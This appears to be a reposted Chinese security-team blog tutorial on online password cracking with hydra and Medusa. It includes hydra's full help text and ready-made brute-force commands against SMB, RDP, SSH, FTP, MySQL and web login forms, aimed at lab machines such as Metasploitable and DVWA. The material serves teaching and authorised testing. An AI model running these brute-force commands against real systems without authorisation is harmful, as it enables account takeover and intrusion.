密码破解——在线破解(hydra、Medusa )
前言
在线破解
把字典里的逐个往服务器里去试
主要学习hydra和medusa
1、hydra
九头蛇(工具名字真的一个比一个有趣)
速度快、功能强大、稳定性差
hydra -hhOptions:-R restore a previous aborted/crashed session-I ignore an existing restore file (don't wait 10 seconds)-S perform an SSL connect-s PORT if the service is on a different default port, define it here-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE-p PASS or -P FILE try password PASS, or load several passwords from FILE-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help-y disable use of symbols in bruteforce, see above-e nsr try "n" null password, "s" login as pass and/or "r" reversed login-u loop around users, not passwords (effective! implied with -x)-C FILE colon separated "login:pass" format, instead of -L/-P options-M FILE list of servers to attack, one entry per line, ':' to specify port-o FILE write found login/password pairs to FILE instead of stdout-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)-t TASKS run TASKS number of connects in parallel per target (default: 16)-T TASKS run TASKS connects in parallel overall (for -M, default: 64)-w / -W TIME wait time for a response (32) / between connects per thread (0)-c TIME wait time per login attempt over all threads (enforces -t 1)-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)-v / -V / -d verbose mode / show login+pass for each attempt / debug mode-O use old SSL v2 and v3-q do not print messages about connection errors-U service module usage details-h more command line options (COMPLETE HELP)server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)service the service to crack (see below for supported protocols)OPT some service modules support additional input (-U for module help)Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)Examples:hydra -l user -P passlist.txt ftp://192.168.0.1hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAINhydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5hydra -l admin -p password ftp://[192.168.0.0/24]/hydra -L logins.txt -P pws.txt -M targets.txt ssh
Windows 密码破解
hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vVd #smb协议比较好破解hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV #rdp协议不稳定,容易漏判
例
开启win2003虚拟机
IP为192.168.1.118
在kali里
nmap -p 192.168.1.118 #扫描端口#发现445,3389hydra -l administrator -P john.txt smb://192.168.1.118 -vV#破解成功,当然这里是设置密码时已经确认过密码在john里有
Linux 密码破解
hydra -l root -P john.txt ssh://192.168.1.113 -vV #这里以metasploitable为目标机其他服务密码破解
hydra -L user.lst -P pass.lst ftp://192.168.1.113 -s 2121 -e nsr -o p.txt -t 64 -vV #最大并发64图形化界面
xhydraHTTP表单身份认证
hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=L in:S=index.php" -Vhydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=L in:Login Failed" -V/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H =X-Foo: Foo#C:先访问指定页面取得cookie#H:指定http头#S:使用SSL连接
pw-inspector
Hydra 小工具
按长度和字符集筛选字典
pw-inspector -i /usr/share/wordlists/nmap.lst -o p1.lst -lpw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -upw-inspector -i /usr/share/wordlists/nmap.lst -o P2.lst -u -m 3 -M 5 #-m和-M指定最小和最大长度
2、Medusa
-
稳定性好
-
速度控制得当
-
基于线程
-
支持模块少于hydra(不支持RDP)
-
WEB-Form 支持存在缺陷
破解windows密码
# -M 指定模块名,使用 -d 可以查询medusa -M smbnt -h 192.168.1.118 -u administrator -P john.txt -e ns -F -v 3 #-v指定细化程度
破解Linux密码
# 使用 ssh 模块medusa -M ssh -h 192.168.1.113 -u root -P pass.txt -e ns –F
其他服务密码破解
medusa -M mysql -h 192.168.1.1132 -u root -P pass.txt -e ns -F表单身份认证
medusa -h 1.1.1.1 -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pass=password&Login=Login"#-n:非默认端口#-s:使用SSL连接#-T:并发主机数
结语
没什么好说的
主要看重字典的质量
一个个试就完事了
红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。
© Honker Security Commando
原文始发于微信公众号(中龙 红客突击队):密码破解——在线破解(hydra、Medusa )
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论